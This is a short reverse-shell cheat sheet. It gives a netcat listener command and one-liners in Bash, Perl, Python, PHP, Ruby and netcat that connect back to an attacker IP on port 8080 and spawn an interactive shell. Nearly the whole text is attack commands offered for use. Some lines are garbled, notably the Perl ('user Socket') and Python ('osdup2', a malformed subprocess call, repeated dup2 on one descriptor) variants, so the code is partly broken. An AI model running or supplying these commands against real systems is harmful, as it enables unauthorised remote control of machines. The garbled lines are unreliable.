a) Following examples assumes that hacker ip is : 10.20.14.203 and using port 8080 for the connection 
b) Therefore in all these cases, you need to listen to port 8080 using the following command 

###
nc -vv -l -p 8080 
###

c) Bash:
####
bash -i >& /dev/tcp/10.20.14.203/8080 0>&1 
####

d) PERL:

######
perl -e 'user Socket;$i="10.20.14.203"; $p=8080;socket(S,PF_INET, SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN, ">&S");open(STDOUT, ">&S");open(STDERR, ">&S");exec("/bin/sh -i");};'
######

e) PYTHON

##########
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("10.20.14.203",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),0);os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); osdup2(s.fileno(),2);p=subprocess.call[["/bin/sh","-i"]);'
##########

f)PHP

##########
php -r '$sock=fsockopen("10.20.14.203",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

##########

g) Ruby 
ruby -rsocket -e'f=TCPSocket.open("10.20.14.203", 8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


h) Netcat:
nc -ef /bin/sh 10.20.14.203 8080 